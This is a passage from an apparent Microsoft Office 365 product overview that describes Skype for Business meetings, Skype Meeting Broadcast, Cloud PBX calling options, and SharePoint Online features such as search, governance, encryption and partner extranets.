- Desktop sharing enables presenters to broadcast any visuals, applications, webpages, documents, software, or part of their desktops to remote participants in real time
- Audience members can follow along with mouse movements and keyboard input. Presenters can choose to share the entire screen or only a portion.
- Enables presenters to share control of software on their desktops without losing sight of participant feedback or text questions.
- Presenters can also delegate control of the application to meeting participants

**Ad-Hoc Skype for Business Meetings**

- Start or join an ad-hoc Skype for Business Meeting with just a few clicks in the Skype for Business client or in Office.

- Escalate simple instant messaging conversations or email conversations to PC-based, multiparty audio and video meetings with shared desktops, applications, and documents

**Skype for Business Multiparty Audio and Video**

- Provides for Skype for Business-based, multiparty (three or more users) audio conferencing capabilities.
- Provides users with an adaptive audio codec for optimal performance under varying bandwidth conditions, visual call and roster controls, network quality indicator, and powerful user management features
- Gallery View shows videos of participants in the conference

**Presenter Controls**

- Mute or unmute all attendees, or mute individual attendees.
- Block attendees from starting video.
- Hide names on the pictures.
- Change permissions so that all participants are attendees instead of presenters.
- Send email invitations to additional people.
- Backstage content preview if the user is a presenter

**Participant Views**

- **Gallery View** shows all the participants' pictures, or videos, plus meeting content.
- **Speaker View** shows the presenter's picture or video at the lower-right corner of the meeting window, plus meeting content.
- **Presentation View** shows only the meeting content.
- **Compact View** shows the tiles of the participants' pictures in a compact window

**PowerPoint**

- Provides multiparty PowerPoint presentation, with higher-resolution displays and support for PowerPoint capabilities, such as animations, slide transitions, and embedded video.

**Web Conferencing Tools**

- Provides multiparty web conferencing capabilities including virtual whiteboard and annotations.
- Annotations made on whiteboards can be seen by all meeting participants
- Enhances collaboration by enabling meeting participants to discuss ideas, brainstorm, take notes, and so on

**Polling**

- Enhances collaboration by enabling presenters to quickly determine participants' preferences.
- During online meetings and conversations, presenters can use polling to gather anonymous responses from participants.
- All presenters can see the results and can either hide the results or show them to all attendees

**Recording and Playback**

- Allows organizers and presenters to record all aspects of a Skype for Business session, including who entered the meeting, audio and video, and content from IM conversations, program sharing sessions, PowerPoint presentations, handouts, whiteboards, and so on.
- Organizers and presenters can choose 480p, 720p HD, or 1080p Full HD as their preferred resolution for client-side recordings.
- Recordings are saved to the presenter's computer
- Recordings can also be uploaded to the **Office 365 Videos** service for sharing with larger audience

**Meeting Lobby**

- Decide who gets into the meeting directly, and who waits until the presenter lets them in
- Different Lobby options can be set for users who are connecting through a Skype for Business client and users who are dialing in

**Scheduled Meetings from Outlook**

- Skype for Business desktop client includes an Outlook plug-in that provides users with single-click scheduling of online meetings in Outlook.
- Participants can join with a single click from the Outlook reminder, or through the Outlook meeting itself

**Federation and Public IM Connectivity**

- External connectivity (federation) enables a Skype for Business user to connect with users in other organizations that use Skype for Business as well as those that host their own Skype for Business Server on-premises.
- Federated contacts can see presence, communicate by using IM, and make Skype-to-Skype audio and video calls

**Interoperability with Third-Party Dial-in Audio Conferencing Services**

- Dial-in audio conferencing, which is the ability to dial into a scheduled Skype for Business meeting/conference from fixed-line or mobile phones, can be achieved through interoperability with leading third-party audio conferencing services.

For more comprehensive information, refer to Skype for Business Online Service Description.

## Device Apps

You can connect with your team anywhere using clients across Windows, Mac, iOS, and Android, or bring remote participants into meeting spaces of all sizes with Skype for Business. Refer to: Download Skype for Business across all your devices.

Skype for Business Mac is now publicly available for download. The Mac client offers edge-to-edge video and full immersive content sharing and viewing. The result is a great first class experience for Mac users.

## Enhancements to Skype for Business mobile apps on Android and iOS

**Present in a meeting from your mobile app**—Now you can present content right from Android or iOS device. No more emailing files and links back and forth when you present from your phone or tablet. Now, sharing a PowerPoint deck in a meeting is as easy as selecting the file from your favorite cloud drive and presenting right from your phone. On Android, you can also share a file stored on the device itself. With swipe gestures, you can easily transition between different slides. Once shared, the PowerPoint file also becomes available in the meeting's content bin for other participants to download or present.

**Video-based Screen Sharing for mobile devices**—We're also continuing to enhance the content viewing experience with Skype for Business on mobile devices by using Video-based Screen Sharing (VbSS) for content viewing on iOS and Android apps. The initial setup is much faster, the experience more reliable, while also consuming network bandwidth efficiently. It provides a seamless viewing experience, especially if you are sharing animated content such as CAD models. Learn more about VbSS and how it can enhance your meeting experience.

## Scenarios

- **Meetings and calls with anyone**. Meet with up to 250 people, even if they're not on Skype for Business. All they need is a phone or internet connection.
  - ○ Financial Sector – Bringing Relationship based and Anonymous customer contact to their web and mobile properties
  - ○ Healthcare – Bringing remote advisory services to patients and connecting doctors around the world
  - ○ Retail – Bringing customer advice to their web properties to upsell and increase sell through
  - ○ Insurance and Travel – To Support brokers and customers with real time communications in the field and in branch locations
  - ○ Recruitment Teams – Connecting Interviewers and candidates to conduct interviews
  - ○ Employee Onboarding – Shorten the time for on-boarding by conducting online sessions for new hires even before their joining date.
- **Enable Work from home**. Home office or field-based employee can rely on the real-time collaboration technologies in Skype for Business to develop and maintain relationships as well as do their job.
- **Drive Knowledge sharing**. Empowers employees to share ideas, best practices and knowledge on processes, products, services, customers and competitors with colleagues across regions, departments and teams. These sessions can be recorded and uploaded to Office 365 Videos for those who couldn't attend the live session.
- **Light up Mobile apps**. Enable custom Mobile apps with real time collaboration. Skype for Business can provide IM and Presence in mobile applications through APIs. Skype URI

integration into mobile apps can launch first party clients for audio/video connectivity.
- **Reduce cost and complexity with one solution**. Skype for Business will work with most communications technology, so you can still make and receive calls on PBX phones and join meetings with video teleconferencing systems. You'll also reduce the cost of supporting multiple services by upgrading to one solution that includes everything—voice, video, and online meetings.

## Resources

**Microsoft Virtual Academy Courses** …

- Bring Your Communications to the Cloud with Skype for Business
- Manage Skype for Business
- Optimize Your Network for Skype for Business
- The Voice of Skype for Business: Cloud and Hybrid

**Read** …

- What's Skype for Business?
- Add a contact in Skype for Business
- Send an IM in Skype for Business
- Make and receive calls using Skype for Business
- Set up a Skype for Business meeting in Outlook
- Start using Skype for Business for IM and online meetings
- Share your desktop or a program in Skype for Business
- Skype for Business Quick Start Guides
- Restrict access to Skype for Business Online with Microsoft Intune

**Skype on iOS and Android** …

- Skype for Business is now on iOS
- Skype for Business for iOS productivity guide
- Skype for Business for Android now available
- Skype for Business for Android productivity guide

## Skype Meeting Broadcast

Skype Meeting Broadcast enables organizations to broadcast a Skype for Business meeting on the Internet to up to 10,000 people, who can attend from a browser on nearly any device. Meeting broadcast makes it easy to host large virtual meetings like internal "Town Hall" style meetings and public webinars.

The service includes integration with Bing Pulse, for real-time polling and sentiment tracking, and Yammer, to enable attendee dialogue during the broadcast.

## Communicate to the size of your audience

### When to use varying types of communication?

Broadcast meetings are the perfect solution for reaching large audiences. See which modes of communication will best help you achieve your goals.

| Communication type | # of people* | Use cases + benefits |
|---|---|---|
| Instant message | 2+ | Quick, informal communication and collaboration |
| Email | 2+ | Written communication that is typically longer than instant messages and is best memorialized in an email thread. |
| Phone Call | 2 | Real-time collaboration. An efficient way to get people up to speed; helps eliminate miscommunications. |
| Conference call | 3+ | Collaborative phone conversation with multiple parties in various locations. |
| Video call | 2-10 | When face-to-face communication is best for a meeting's success, but people are in different locations. |
| Webinar | 10–250 | Presenting information to a medium-sized or largescale audience. May or may not require or allow audience participation |
| Broadcast | 250–10,000 | One-way presentation or town-hall style meeting, catered to reach a large audience in many locations |

*Based on general numbers and software; actual numbers may vary with different platforms.

### When to meet and when to broadcast?

A typical video call or meeting can pose problems when accommodating more than a few attendees—while they're great for one-on-one collaboration sessions, background noise, a lack of control, and scaling capabilities limit their effectiveness. A larger audience requires a more robust alternative. Consider a broadcast solution for meetings you'd hold in an auditorium, if everyone were in the same location. Online meetings are comparable to the type of meeting you'd hold in a conference room. Take a look at when a broadcast or meeting solution is best for your needs.

**Broadcast Solution**

 Reaches large-scale audiences

 Formal production and event

 One-way communication

 Audience participation options

Town-hall style meetings

**Meeting Solution**

 Small, team-based

 Informal and more intimate

 Multiple speakers

 Collaborative

Conference room-style meetings

## Skype Meeting Broadcast roles

- **Organizer**. Creates the meeting request and invites attendees. Reviews meeting reports.
- **Producer**. Manages the meeting sources (live presentations, dial-in presentations, audio, video, and PowerPoint decks), records the event, and posts the recording to Office 365 Video.
- **Event team member**. Participates in the meeting by presenting live or dialing in from a remote location.
- **Attendee**. Watches the event online.

**Attendee options**

- **Anonymous**: anyone with the meeting link can join the meeting
- **Secure**: only attendees listed below can join the meeting
- **All Company**: anyone from my company can join the meeting

## Features

- **Schedule your meeting**: use the Skype Meeting Broadcast scheduling and management portal to schedule a meeting
- **Manage an Event**: Upload PowerPoint decks, cue live feeds from Camera sources, activate feeds and, switch sources during event. You can have one feed providing audio and another providing video.
- **Customize your meeting**: add a Yammer feed or Bing Pulse to your meeting so your audience can participate during the event and you can gauge their involvement and satisfaction

## Large Meeting Capabilities

| | Skype Meeting | Skype Meeting Broadcast |
|---|---|---|
| Maximum audience size | 250 | 10,000 |
| Presenter Camera A/V | ● | ● |
| Present a PowerPoint | ● | ● |
| Desktop & App Sharing | ● | ● |
| Attendee Camera A/V | ● | |
| Collaborative Apps (Whiteboard, Poll, Q&A) | ● | |

| | Skype Meeting | Skype Meeting Broadcast |
|---|:---:|:---:|
| Engagement Apps (Pulse, Yammer, Q&A) | | ● |
| PSTN Access | ● | ● |
| Cloud based meeting recording | | ● |
| Client DVR controls (ex: pause, rewind) | | ● |
| Branded meeting experience | | ● |
| Meeting Producer role | | ● |



## Set up Skype Meeting Broadcast

Distribution of the media content of a broadcast meeting utilizes Microsoft Azure's Content Delivery Network (CDN) to achieve very high scale, supporting thousands of people watching a broadcast. The chunked media content passing through the CDN is encrypted, and the CDN cache has a limited lifetime. Because Azure CDN is not included in the services that commit to meet the EU Standard Contractual Clauses, Skype Meeting Broadcast has been **disabled by default for all locations worldwide.**

Customers with EU Standard Contractual clauses must choose whether or not to opt into the service after reviewing the information in our communication to them.  In the regions not affected by the EU Standard Contractual Clauses, the IT Admin can manually activate the Skype Meeting Broadcast feature.

To setup …

- **Enable Skype Meeting Broadcast for your organization**: You need to enable Skype Meeting Broadcast for your organization. See, Enable your organization for Skype Meeting Broadcast to have us walk you through this.
- **Enable external access and setting up allowed domains**: You can use either Skype for Business admin center or the Office 365 admin center to enable external access and allow access. See, Set up Skype Meeting Broadcast for the walkthrough

The Skype Meeting Broadcast portal can be found at **portal.broadcast.skype.com**.  You can also go to **broadcast.skype.com** and go to the main Skype Meeting Broadcast page.

## Resources

**Watch Videos …**

- First look at Skype Meeting Broadcast

**Read …**

- What is Skype Meeting Broadcast?
- Schedule a Skype Meeting Broadcast event
- Manage a Skype Meeting Broadcast event
- Join a Skype Meeting Broadcast
- Set up Skype Meeting Broadcast
- Enable your organization for Skype Meeting Broadcast

## Cloud PBX

Microsoft offers a variety of options for enabling your users to call landlines and mobile phones through the Public Switched Telephone Network (PSTN)--whether their accounts exist in Office 365 on Skype for Business Online or in your on-premises Skype for Business Server or Lync Server 2013 deployment.

**Enterprise Voice**

Enterprise Voice is Microsoft's world-class software-powered Voice over Internet Protocol (VoIP) solution, included in on-premises deployments of Skype for Business Server. Enterprise Voice offers a rich set of capabilities and features, including Response Groups, Call Park, Enhanced 9-1-1, and much more. Enterprise Voice is a full PBX system for your organization, including PSTN connectivity through your local operator

For more information about Microsoft's Enterprise Voice solutions, see: Plan for Enterprise Voice in Skype for Business Server 2015, Deploy Enterprise Voice in Skype for Business Server 2015.

**Cloud PBX**

Cloud PBX is Microsoft's technology for enabling call control and PBX capabilities in the Office 365 cloud with Skype for Business Online. Skype for Business Cloud PBX allows you to replace your existing PBX system with a set of features directly delivered from Office 365 and tightly integrated into the company's cloud productivity experience.

With Cloud PBX, your users can use Skype for Business Online to take care of basic call control tasks, such as placing and receiving calls, transferring calls, and muting and unmuting calls. Cloud PBX users can click a name in their address book, and Skype for Business places a call to that person. To place and receive calls, Cloud PBX users can use their mobile devices, a headset with a laptop or PC, or one of many IP phones that work with Skype for Business.

To enable calls to landlines and mobile phones, Cloud PBX can be connected to the PSTN in one of two ways:

- By purchasing the **PSTN Calling service add-on** to Office 365.
- By using **on-premises PSTN connectivity**, where software on-premises connects with your existing telephony infrastructure.

**Skype for Business – Advanced Features**

| Feature | Cloud PBX | PSTN Conf | PSTN Calling |
|---|:---:|:---:|:---:|
| End-user call handling (answer, hold, transfer, ring) | ● | | |
| Setup and use call designation | ● | | |
| Team Calling | ● | | |
| Use IP Desk Phone | ● | | |
| Set and enforce calling policies | ● | | |
| Emergency calling | ● | | |
| Skype for Business Plus CAL | ● | | |
| Dial-in for Skype Meetings | | ● | |
| Meeting dial out to PBX/PSTN users | | ● | |
| Default join from PBX/PSTN phones | | ● | |
| Phone number assignment | | | ● |
| Inbound calling | | | ● |
| Outbound calling (domestic/int'l) | | | ● |

## Cloud PBX solutions

You can choose a completely-in-the-cloud offering, or you can choose a hybrid deployment that takes advantage of Cloud PBX, but keeps some functionality on premises. Depending on your needs, you can choose to have PSTN functionality provided by the Office 365 service or by your on-premises software--as shown in the following diagram



- **Cloud PBX with PSTN Calling service** – This is the service plan you can add to Cloud PBX to enable calling to landlines and mobile phones around the world (depending on the level of service being licensed). Your users are homed in the cloud and are enabled for Cloud PBX with PSTN Calling provided by Microsoft. The PSTN Calling offering is an add-on to Office 365 that does not require an on-premises server deployment.
- **Cloud PBX with on-premises PSTN connectivity** – This option uses software on premises to connect your existing PSTN carrier, circuit, and contract with Office 365. Your users are homed in the cloud and are enabled for Cloud PBX, but their calling is processed through software on premises.

## PSTN Calling service

**PSTN Calling service** is the service that works with Cloud PBX allowing users to make calls to landlines and mobile phones. Because the PSTN Calling service operates out of Office 365, this is a completely-in-the-cloud offering that does not require an on-premises server deployment.

Users of this option are homed in Skype for Business Online in Office 365 and have access to Skype for Business Online voice services. Microsoft is the provider of both core calling and PSTN services, and can even provide or port your users' phone numbers.



PSTN Calling service is available in specific but growing geographic locations. Please check with your Microsoft representative for availability in your area.

## On-premises PSTN connectivity with Cloud Connector Edition

**Cloud Connector** is a set of packaged Virtual Machines (VMs) that implement on-premises PSTN connectivity with Cloud PBX.

This hybrid offering is designed for organizations that want to enable their Skype for Business Online users to use their existing on-premises PSTN connection, with Skype for Business call control in the cloud.



With this option, you deploy a set of packaged VMs that contain a minimal Skype for Business Server topology--consisting of an Edge component, Mediation component, and a Central Management Store (CMS) role. These services are configured for hybrid with your Office 365 tenant that includes Skype for Business Online services.

## On-premises PSTN connectivity with an existing deployment

You can implement a hybrid solution using your existing Skype for Business Server deployment and PSTN connectivity. In this topology, users are homed in the cloud on Skype for Business Online instead of being homed on the on-premises deployment. You can choose this option if you currently have users homed in the cloud or if you want to start migrating users to the cloud.



With this option, your Skype for Business Online users get their PSTN connectivity through Enterprise Voice on your on-premises Skype for Business Server deployment, with Skype for Business call control in the cloud.

## Resources

- Plan your Cloud PBX solution in Skype for Business 2015 or Lync Server 2013
- Plan Cloud PBX with on-premises PSTN connectivity in Skype for Business Server 2015 or Lync Server 2013
- Deploy Cloud PBX with on-premises PSTN connectivity in Skype for Business Server 2015 or Lync Server 2013
- Plan for Skype for Business Cloud Connector Edition
- What is PSTN Calling?
- Plan for Skype for Business Cloud Connector Edition
- Configure Skype for Business Cloud Connector edition

# SharePoint Online (SPO)

SharePoint is about giving you and the people you work with a **better way to get things done together**. That means your content is stored and organized in one place. You can access it from virtually anywhere and share it with anyone.

SharePoint Online delivers the powerful features of SharePoint without the associated overhead of managing the infrastructure on your own. Flexible management options ensure that you still retain the control you need to meet the compliance requirements of your organization.

## Features

### Content

The following Content features makes Enterprise Content Management (ECM) easy for everyone. It's the combination of traditional content management, social capabilities, and powerful search.

- **Accessibility Standards Support**: Most SharePoint user interface (UI) elements, such as links, form controls, and buttons are designed to use Microsoft Active Accessibility (MSAA).
- **Asset Library**: Library pre-configured to use special features that help users manage rich media assets, such as image, audio, and video files
- **Content Organizer**: Acts as a gatekeeper for documents. You can automatically manage some important library tasks, such as managing folder sizes and routing documents to different libraries or folders. This not only saves time, but can help make sure that a document library is managed consistently.
- **Document Sets**: Let users store, act on, export, and add a description to multiple files as a single entity. Policies, tagging, and templates can be applied to any document set that is created.
- **External Sharing: External Access**: You can use sites to share content with people outside your organization. When a site is shared in SharePoint Online, an email message is sent to the external user containing the invitation to join the site.
- **External Sharing: Guest Link**: Site users can generate a Guest Link (an anonymous link to a document) to share documents stored in SharePoint Online with external users without requiring the external user to sign in. Site users can create a Guest Link right from where the document is stored by using the "Get a link" button
- **Information Rights Management (IRM)**: IRM uses Azure Rights Management (RMS), an information protection technology in Office 365. IRM protection is applied to files at the SharePoint list and library levels.
- **Managed metadata service**: Provides multiple taxonomies and folksonomies from a tenant-level store service that can be consumed at the site collection level. Metadata fields can even be embedded in documents
- **Metadata-driven Navigation**: Makes it easier to discover content in large lists and libraries. User tagging incentives

are introduced and offer anticipatory suggestions of appropriate metadata based on location and context

- **Multi-stage Disposition**: Retentions policies can have multiple stages, allowing you to specify the entire document lifecycle as one policy. For example, review contracts every year, and delete after seven years.
- **Preservation hold library**: Content that is placed on hold is preserved, but users can still change it. The state of the content at the time of preservation is recorded. If a user changes the content or even deletes it, the item is retained at the time of deletion and the original, preserved version is still available.
- **Records management**: In SharePoint, you can manage records in an archive or you can manage records in-place in the same document repository as active documents.
- **Recycle Bin (SharePoint admin center)**: SharePoint Online administrators can restore a deleted site collection by using SharePoint admin center
- **Recycle Bin (site collection)**: SharePoint users have a Recycle Bin where deleted content is stored. They can access the Recycle Bin to recover deleted documents and lists, if they need to. Items in the Recycle Bin are retained for 90 days.
- **Unique Document IDs**: Improves the managing and tracking of information by assigning a unique, human-readable identifier to every piece of content, making it easier to locate, even if the content was moved from its original location.
- **Managed navigation**: Navigation method that lets you define and maintain your site navigation by using term sets

### Insights

The following Insights features allow organizations to use the information in databases, reports, and business applications to address their specific business needs.

- **Excel Services**: Enables you to share workbooks with others, interact with reports, view and explore information in a browser window, and refresh data.
- **Power View for Excel in SharePoint**: You can use Excel Online to view and interact with workbooks that contain Power View sheets in a browser window.
- **Power Pivot for Excel in SharePoint**: You can use Excel Online to view and interact with charts, tables, PivotChart reports and PivotTable reports in a browser window.
- **Visio Services**: Lets users share and view Microsoft Visio Drawing (*.vsdx) and Visio 2010 Web drawing (*.vdw) files using Web Browser

Also, refer to the Power BI section later in this document.

### Search

The following Search features help people find the information that they need to do their jobs. Search is a combination of relevance, refinement, and people.

- **Advanced content processing**: To improve search relevance, the document parsing functionality in the content processing component analyzes both the structure and content of documents. Documents parsers extract useful metadata and remove redundant information.

- **Continuous crawls**: Help keep search results fresh by frequently crawling content in SharePoint sites. Continuous crawls are enabled in SharePoint Online, with crawl frequencies managed by Microsoft.
- **Deep links**: Search system automatically creates links directly to sub-sections of a main page that is frequently visited.
- **Event-based relevancy**: Determines the relevance of search results in part by how content is connected, how often an item appears in search results, and which search results people click.
- **Phonetic name matching**: Improved phonetic name matching finds search results for similar sounding names (is it John or Jon?).
- **Query rules—add promoted results**: In a query rule, specify conditions and correlated actions. When a query meets the conditions in a query rule, the search system performs the actions specified in the rule. The "Add promoted results" action lets you promote individual results so that they appear at the top of search results
- **Query rules—advanced actions**: The "Add result blocks" action lets you display a subset of the search results as a group. The "Change ranked results by changing the query" action lets you change the ranking of the returned search results
- **Query spelling correction**: Edit exclusions and inclusions lists to decide which queries the search results page should display alternative query spellings for. This feature is often called "Did you mean?".
- **Query suggestions**: Suggested phrases that users have already searched for. The suggestions appear in a list below the Search Box as a user types a query. Query suggestions are generated automatically, and phrases can be added to the system as "always" or "never" suggest.
- **Quick preview**: Users can rest the pointer over a search result to preview and interact with the document or site content in the hover panel to the right of the result. The preview shows rich metadata and has deep links to the main sections of the document or site
- **Refiners**: Categorize the top documents in SharePoint Server search results into groups that let users filter the search results

### Sites

- **Change the look**: Quickly customize your team site so that it's easier to use and reflects your professional style and brand. You can change the background image, colors, site layout and fonts with just a few clicks.
- **Governance**: Important but often invisible part of any site is its governance model—the set of policies, roles, responsibilities, and processes that you establish to determine how the people in your group use SharePoint.
- **Mobile Connectivity**: You can access SharePoint sites on the go from an Internet-connected mobile phone or tablet. You can view and update documents, lists, and other site content and collaborate with colleagues, all from your mobile device.
- **Permissions Management**: Three key security elements work together to control user access to sites and site

content: permissions inheritance, permission levels (sometimes known as SharePoint roles), and SharePoint groups (or SharePoint security groups).

- **SharePoint Lists**: List is a collection of data that you can share with team members and other site users. For example, you can create a sign-up sheet for an event or track team events on a calendar by using a list.
- **Drag & Drop**: Upload documents, pictures, and other types of files to your site by dragging them from your computer to a library on your site.
- **Editing text on sites**: Embed videos, cut and paste from Microsoft Word without losing your formatting, and drag and drop images into the rich text editor.
- **Notebook**: When you create a team site, a OneNote shared notebook is automatically created as part of the site. You can use this notebook to capture, compile, and share information.
- **Simplified Access**: When you share a site, you invite other people to have access to the site. You can share any site in which you have the required permissions.
- **Templates**: When you create a new site in SharePoint, you start by selecting a site template to base your site on. Site templates contain lists, libraries, pages, and other elements or features that support the needs of an organization.
- **Themes**: Quickly customize your team site so that it's easier to use and reflects your professional style and brand. Themes are a quick and way to apply colors and fonts to sites.
- **Usage Analytics**: Web Analytics reports are pre-built reports in SharePoint that use usage data to analyze various aspects of sites and site collections.

**Social**

- **Blogs**: Enable an organization to quickly share information among employees, partners, or customers. People can add insight to a difficult subject area, provide inspiration and guidance, or explain a new guideline or procedure.
- **Document Conversations with Yammer**: Start a conversation about a document, image, or video that is stored in a SharePoint Online document library
- **One Click Sharing**: Share documents and sites with others in your organization helping promote team collaboration
- **Ratings**: Add ratings to document libraries that allow sites visitors to 'Like' a library document or to use a 'star' tool to rate it.
- **Wikis**: Site designed for groups of people to quickly capture and share ideas by creating simple pages and linking them together. Every team site is a wiki, but you can also add a separate wiki page library to a site, or create a large-scale Enterprise wiki as a separate site or site collection

**Developer**

The following features support developers who want to build apps and solutions to extend SharePoint functionality.

- **Access Services**: Build web databases and publish them to a SharePoint site. Users can use your database application in a web browser by using SharePoint permissions to determine who can see what.

- **App Catalog (SharePoint)**: Publish your apps to an internal corporate catalog to make them available to users
- **Provider-hosted Add-in**: Add-ins that include at least one remote component and may also include SharePoint-hosted components
- **SharePoint-Hosted Add-in**: Allows you to reuse common SharePoint artifacts, such as lists and Web Parts. When you take this approach, you can use only JavaScript and you cannot use any server-side code
- **Browser-based customizations**: Customize your site without any special tools or coding expertise just by using the site settings. For example, you can change the look, title, and logo, change the navigation links, change the contents of a page, or change the appearance of views for lists and libraries.
- **Developer Site**: Use an Office 365 Developer Site as a development and testing environment to shorten your setup time and start creating, testing, and deploying your apps for SharePoint.
- **JavaScript Object Model**: SharePoint provides a JavaScript object model for use in either inline script or separate .js files. It includes all the same functionality as the .NET Framework and Silverlight client object models.
- **Office 365 APIs**: Provide access to your SharePoint Online data using REST APIs. You can access the Office 365 APIs from solutions across all mobile, web, and desktop platforms
- **Remote Event Receiver**: To handle events in an app for SharePoint, developers can create remote event receivers and app event receivers. Remote event receivers handle events that occur to an item in the app, such as a list, a list item, or a web.

Also, refer to the Office 365 Application Development section later in this document.

**IT Professional**

- **Anti-malware protection**: Provides anti-malware protection for files uploaded and saved to document libraries, using the Microsoft anti-malware engine that is also integrated into Exchange.
- **Data loss prevention**: Identifies sensitive data stored in SharePoint Online. Identifying sensitive data can help you reduce risks to your organization. You can search for the sensitive information types in your organization using the eDiscovery Center.
- **Encryption at rest**: There are two levels of encryption at rest for SharePoint Online- BitLocker encryption and. Per-file encryption.
- **Minimal Download Strategy (MDS)**: Uses a single .aspx file (start.aspx) for your pages, with the actual URL encoded in the text following the hashmark ('#'). When moving from page to page, only the changes between two compatible pages will be downloaded. Fewer bytes will be downloaded and the pages will appear more quickly.
- **SharePoint admin center**: Enables administrators to manage features such as: Site collections, User Profiles, Managed metadata and the Term Store, Records management, Search, Apps for SharePoint, External sharing,

Information Rights Management and, Self-service site creation

- **Windows PowerShell Support**: Administrators can use SharePoint Online Windows PowerShell cmdlets to script and automate administrative tasks.

For more comprehensive feature list, refer to SharePoint Online Service Description.

> Keep track of monthly updates to SharePoint Online here: What's new in Microsoft SharePoint Online.

**Browser Support**

SharePoint Online supports the latest version of the Safari, Firefox, Chrome and Edge browsers, along with Internet Explorer 10 and 11. Older versions of Internet Explorer are already out of support generally.

## Per-File Encryption

Encryption at rest includes two components: BitLocker disk-level encryption and per-file encryption of customer content.

File-level encryption at rest takes advantage of blob storage to provide for virtually unlimited storage growth and to enable unprecedented protection.

> As part of public roadmap, **customer-controlled** SharePoint and OneDrive **encryption keys** will be available in Q1 CY2017

Refer to following online resources for more details:

- File Security in Microsoft SharePoint and OneDrive for Business
- Enhanced conditional access controls, encryption controls and site classification in SharePoint and OneDrive
- Ignite video: Learn how SharePoint safeguards your data in the cloud

## Where you can store documents in Office 365?



- **OneDrive for Business** is designed for individual use, with the occasional sharing of files. OneDrive for Business is ideal for storing files you own.
- **SharePoint Team site** is designed for sharing and collaborating on files regularly. A team site is ideal for storing files that have shared ownership, that is, where several people or the whole team owns the files and might collaborate on them.

Both OneDrive for Business and Team Sites provide anywhere access for you and your employees.

## File Storage in Office 365 Groups

Office 365 Groups provide an integrated experience that link together email conversations, file storage, and calendar event management. File storage for Groups is accessed through OneDrive for Business, using a dedicated document library connected to the Group.

Use of Office 365 Groups is suggested when the team **needs File sharing in addition to shared Mailbox, Calendar and OneNote**. Simple collaboration scenarios, where a single library meets the needs, is best fit for Groups. Think of various teams working in Pre-Sales, Sales, Marketing, Accounts, Projects departments.

For content-centric enterprise applications like – Sales Portal, Knowledge Management Portal, Policy Portal etc. leverage SharePoint Online for content management.

## Governance Model

An important but often invisible part of any site is its *governance model*—the set of policies, roles, responsibilities, and processes that you establish to determine how the people in your group use SharePoint.

A governance model makes it easier to:

- Let site users know when they should create a new sub-site, as opposed to creating a list or other site content.
- Make sure sub-sites and content are retired when they're obsolete, rather than using up your storage space and diluting your search results.

- Ensure that the right people have access to the right content.
- Let sub-site owners know what templates and themes they can use.
- Smoothly transition ownership of a site from one person to another.

## Elements of a governance model

Your governance model needs to address the following issues:

- Site creation
- Permissions management
- Information architecture
- Site lifecycle and retirement
- Storage limits
- Classification of information
- Customization
- Data protection
- Navigation
- Search
- Roles and responsibilities for supporting the site

## Information architecture

A site's information architecture is like the table of contents for a book: It determines how the information in that site — its webpages, documents, lists, and data — is organized and presented to the site's users. Information architecture is often recorded as a hierarchical list of site content, search keywords, data types, and other concepts.

To create an information architecture, you must analyze the information to be presented in the site. Here are some of the questions you can use to develop an information architecture:

- What kind of content will you have on the site? How will that translate into sub-sites, lists, libraries, and so on?
- How will information be presented in the site?
- How will site users navigate through the site?
- How will information be targeted at specific audiences?
- How will search be configured and optimized?

Part of your information architecture might include classification of information.

If the information you're dealing with has high value to the company, requires special security, or is covered by regulatory compliance rules, you might want to set up a classification scheme to identify specific types of content that need to be managed carefully. After you've organized information into specific lists and libraries, you can use governance features to manage how the content is managed.

Please refer to the article - Best practices for creating and managing team sites for more information on Governance and Best Practices.

## Using SharePoint Online as a B2B Extranet solution

With SharePoint Online, partners connect directly to a members-only site in Office 365, without access to the corporate on-premises environment or any other Office 365 site. Office 365 Extranet sites can be accessed anywhere.

Industry verticals where business-to-business (B2B) collaboration is key to their business success include the automotive, manufacturing, retail and energy. The following example depicts Contoso Ltd, a company whose core of their business is collaboration with partners and vendors.



## SharePoint Online B2B collaboration features

- **SPO Cloud B2B:** You can have both Intranet and Extranet (B2B) sites in the same SharePoint online tenant. You can allow sharing with user initiated invitations but with added IT control.
- **Site-owners only sharing:** Ability to have site collections where only Owners can bring in or share with new users. Site Members, which are typically external partner users, can see only the existing site members in the site. This helps in governing what partners can see and with whom they can share your corporate partnership documents. See Create a partner-facing Extranet Site in Office 365 for more details.
- **Allow users to Invite new partner users:** In certain Site Collections, Admins can optionally allow users to invite new partner users. In this model, an email invite is sent to the partner user and the user must redeem that invite to access the resource. See Manage external sharing for your SharePoint Online environment for details.
- **Restricted Domains Sharing:** Admins can control the list of partner domains that their employees can share with outside the organization. Either an allow list or a deny list of email domains can be configured. See Restricted Domains Sharing in O365 SharePoint Online and OneDrive for Business more details.
- **Auditing & Reporting:** Activities of the business partner users are audited and reports can be viewed in Office 365 Activity Reports.

For more details, please refer to the support article - SharePoint Business to Business Collaboration: Extranet for Partners with Office 365.

## New and Upcoming Features

Microsoft's vision for SharePoint Online focuses on four areas of innovation:

- Simple and powerful file sharing and collaboration on any device.
- The mobile and intelligent intranet, with modern team sites, publishing, and business applications on your desktop and in your pocket.
- An open and connected platform that evolves SharePoint extensibility to embrace modern web development.
- Investments in security, privacy and compliance across Office 365.

Please refer the blog post and watch the Microsoft Mechanics playlist to learn about great new features coming to SharePoint Online..

### SharePoint home page in Office 365

The SharePoint home page in Office 365 is where you can easily find and access SharePoint sites and portals within your organization. If enabled by your administrator, you can also quickly create new team sites from the SharePoint home page.



1. A search box where you can search for sites you've recently visited or files you've recently viewed or edited. You can also search for other sites, files, or people in your organization.
2. A link to start a new team site if enabled by your administrator. For help starting a new team site, see Create a site.
3. SharePoint sites you're following.
4. Recent SharePoint sites you've visited. Clicking **See all** will take you to a page that lists all recent SharePoint sites you've visited.
5. Links to SharePoint sites and portals featured by your organization. If you're an Office 365 administrator, you can

set which links appear in this section. For more information, see Change the Links list on the SharePoint Home page.
6. SharePoint sites you visit frequently or, if enabled by your administrator, a list of recommended SharePoint sites generated by Office Delve. In addition to the site name and link, you will also see recent activity information about the site, for example, if something on the site has been recently updated. If 12 or more sites are listed in this section, you'll see a **See all** link that, when clicked, will take you to a page that lists all of the SharePoint sites you visit frequently.
7. Suggested SharePoint sites based on recent searches or, if enabled by your administrator, a list of recommended SharePoint sites generated by Delve.

For more details, refer to the Find sites and portals in Office 365 article.

### Modern Experiences in SharePoint Online

The modern experiences in SharePoint Online are:

- **Modern team sites**
- **Modern list and library experiences**
- **Modern site pages**

